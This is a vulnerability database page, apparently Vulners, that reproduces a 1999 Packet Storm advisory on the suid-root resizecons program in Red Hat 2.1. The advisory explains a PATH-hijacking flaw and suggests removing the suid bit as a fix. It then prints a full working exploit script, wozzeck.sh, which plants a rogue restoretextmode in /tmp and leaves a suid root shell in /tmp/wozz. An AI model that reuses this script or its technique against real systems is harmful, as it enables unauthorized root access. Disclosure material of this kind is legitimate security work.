Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

resizecons.sh

🗓️ 17 Aug 1999 00:00:00Reported by Packet StormType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 15 Views

Security flaw in RedHat 2.1 allows arbitrary root command execution via resizecons program.

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
` There is a security hole in RedHat 2.1, which installs the program  
/usr/bin/resizecons suid root. The resizecons program allows a user  
to change the videmode of the console. During this process, it runs  
the program restoretextmode without an absolute pathname, assuming the  
correct version will be found in the path, while running with root  
privileges. It then executes setfont in the same manner. By setting  
the path to find a rogue restoretextmode, a user can execute an arbitrary  
program as root.  
As a more amusing aside, the file /tmp/selection.pid is read and the  
pid contained within is sent a SIGWINCH, allowing a user on the system  
to force a redraw of the screen to an arbitrary process (that handles   
SIGWINCH calls) on the machine.   
If /usr/bin/resizecons needs to be run by users other than root at the  
console, provisions need to be made in the code to execute the outside  
utilities with absolute pathnames, and to check access rights on files  
before opening.  
  
Program: /usr/bin/resizecons  
Affected Operating Systems: Red Hat 2.1 linux distribution  
Requirements: account on system  
Temporary Patch: chmod -s /usr/bin/resizecons  
Security Compromise: root  
Author: Dave M. ([email protected])  
Synopsis: resizecons runs restoretextmode without an  
absolute pathname while executing as root,  
allowing a user to substitute the real  
program with arbitrary commands.  
  
Exploit:  
  
wozzeck.sh:  
#!/bin/sh  
#  
# wozzeck.sh  
# exploits a security hole in /usr/bin/resizecons   
# to create a suid root shell in /tmp/wozz on a   
# linux Red Hat 2.1 system.  
#  
# by Dave M. ([email protected])  
#   
echo ================ wozzeck.sh - gain root on Linux Red Hat 2.1 system  
echo ================ Checking system vulnerability  
if test -u /usr/bin/resizecons  
then  
echo ++++++++++++++++ System appears vulnerable.  
cd /tmp  
cat << _EOF_ > /tmp/313x37  
This exploit is dedicated to   
Wozz. Use it with care.  
_EOF_  
cat << _EOF_ > /tmp/restoretextmode  
#!/bin/sh  
/bin/cp /bin/sh /tmp/wozz  
/bin/chmod 4777 /tmp/wozz  
_EOF_  
/bin/chmod +x /tmp/restoretextmode  
PATH=/tmp  
echo ================ Executing resizecons  
/usr/bin/resizecons 313x37  
/bin/rm /tmp/restoretextmode  
/bin/rm /tmp/313x37  
if test -u /tmp/wozz  
then  
echo ++++++++++++++++ Exploit successful, suid shell located in /tmp/wozz  
else  
echo ---------------- Exploit failed  
fi  
else  
echo ---------------- This machine does not appear to be vulnerable.  
fi  
  
  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
17 Aug 1999 00:00Current
7.4High risk
Vulners AI Score7.4
security holeredhat 2.1resizecons programarbitrary commandsroot privilegespath exploitationtemporary patch
15
.json
Report